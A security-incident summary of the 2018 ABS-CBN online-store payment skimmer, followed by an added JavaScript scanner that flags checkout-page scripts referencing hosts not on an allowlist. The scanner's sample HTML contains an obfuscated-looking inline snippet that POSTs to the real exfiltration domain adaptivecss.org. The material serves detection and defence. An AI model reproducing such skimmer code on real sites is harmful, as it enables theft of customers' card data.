Cyber Incident Victim: ABS-CBN
Date: Aug 2018
Location: Philippines
Summary
A major Filipino broadcaster experienced a financial data breach when malware embedded in its online store's JavaScript file intercepted customer payment card details during checkout. The stolen information was transmitted to servers in Russia, with the skimmer operating for several weeks before detection. Security researchers confirmed the malicious code remained active at the time of discovery and had targeted customers purchasing merchandise. The company later acknowledged the incident, estimating 213 individuals might have been affected, and temporarily shut down the compromised e-commerce platforms while emphasizing the breach was isolated to specific store websites.
Description
The ABS-CBN data breach was discovered by Dutch security researcher Willem de Groot, who identified a payment skimmer operating within the Filipino broadcaster's online store. The malware, embedded in an obfuscated JavaScript file on the store's website, had been active since at least August 16, 2018, and remained unchanged for four weeks prior to detection. This skimmer intercepted customers' payment card details during the checkout process when purchases were made through the ABS-CBN Store and UAAP Store websites. The stolen financial data was transmitted to a server associated with the domain adaptivecss.org, which was hosted on a Russian network in Irkutsk. This network was also linked to coffeemokko.com, a domain previously connected to other malware campaigns uncovered by de Groot. Google Chrome flagged the affected online store as insecure at the time of discovery, though the exact method of initial compromise remained unspecified. De Groot attempted to notify ABS-CBN about the breach but received no immediate response.

On September 19, 2018, ABS-CBN confirmed the incident was under investigation and temporarily shut down both affected store websites. The company stated the breach was isolated to these two e-commerce platforms, with no impact on other digital properties. ABS-CBN estimated 213 customers may have had their financial data compromised during the skimmer's operation. The broadcaster characterized the incident as a theft of payment card information but did not disclose technical specifics about how the malware was deployed or whether additional personal data was accessed. In a public statement, ABS-CBN emphasized its commitment to customer privacy and security, pledging to implement measures to prevent future breaches. The duration of the skimmer's activity and its connection to known malicious infrastructure suggested a coordinated attack, though no threat actor claimed responsibility.
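The skimmer described above hid in an obfuscated script on the checkout page and posted card data to a host (adaptivecss.org) that had no business appearing on a broadcaster's store. One defensive check that would have surfaced it is a periodic scan of the rendered checkout HTML for script origins and embedded hosts that are not on the site's own allowlist. The following is an added example written for this page, not code from ABS-CBN, the researcher, or the original article; the allowlist hosts (store.example.com, cdn.example.com), the sample HTML and the function names are constructed assumptions, and the only real value it uses is the exfiltration domain the page names.

```javascript
// Added example (not from the original page): a static scanner for a checkout page's HTML that
// lists the hosts its scripts load from or mention and flags any host not owned by the site.
// A skimmer like the one in this incident shows up either as an unexpected external <script src>
// or as an inline script that names a foreign host to which the harvested form data is sent.

// Assumption: these are the hosts the store legitimately serves or loads scripts from.
const ALLOWED_HOSTS = new Set(['store.example.com', 'cdn.example.com']);
const SITE_ORIGIN = 'https://store.example.com/'; // assumption: used to resolve relative src paths

// Resolve a script src (absolute, protocol-relative or relative) to a lowercase hostname.
function hostOf(src) {
  try {
    return new URL(src, SITE_ORIGIN).hostname.toLowerCase();
  } catch (e) {
    return null; // unparsable src: nothing to compare against the allowlist
  }
}

// Pull hostnames out of every <script> tag: the src attribute, and any http(s) URL that
// appears literally inside an inline script body (obfuscated skimmers often still carry
// their collection URL as a plain string).
function extractScriptHosts(html) {
  const hosts = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const srcMatch = attrs.match(/\bsrc\s*=\s*["']([^"']+)["']/i);
    if (srcMatch) {
      const h = hostOf(srcMatch[1]);
      if (h) hosts.push({ host: h, where: 'src' });
    }
    const urlRe = /https?:\/\/([a-z0-9.-]+)/gi;
    let u;
    while ((u = urlRe.exec(body)) !== null) {
      hosts.push({ host: u[1].toLowerCase(), where: 'inline' });
    }
  }
  return hosts;
}

// Return each host that is referenced by a script but absent from the allowlist, once per host.
function findUnexpectedHosts(html, allowed = ALLOWED_HOSTS) {
  const seen = new Set();
  const findings = [];
  for (const { host, where } of extractScriptHosts(html)) {
    if (allowed.has(host) || seen.has(host)) continue;
    seen.add(host);
    findings.push({ host, where });
  }
  return findings;
}

// Constructed sample checkout page: two legitimate scripts plus an obfuscated-looking inline
// script whose only readable clue is the foreign host named in this incident.
const SAMPLE_HTML = `
<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example.com/jquery.min.js"></script>
<script>
var _0x1a=['https://adaptivecss.org/'];var _0x2b=new XMLHttpRequest();_0x2b.open('POST',_0x1a[0]);
</script>
</head><body></body></html>`;

// Usage: run the scan and print anything that should not be there.
for (const f of findUnexpectedHosts(SAMPLE_HTML)) {
  console.log(`unexpected script host ${f.host} (found in ${f.where})`);
}
```

Run against a copy of the live checkout page on a schedule and alert on any new host; because the inline check keys on URL strings rather than on the script's logic, it survives most string-array obfuscation but will miss a collection URL that is assembled at runtime, so pair it with a Content-Security-Policy `connect-src`/`form-action` allowlist in report mode to catch the request itself.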
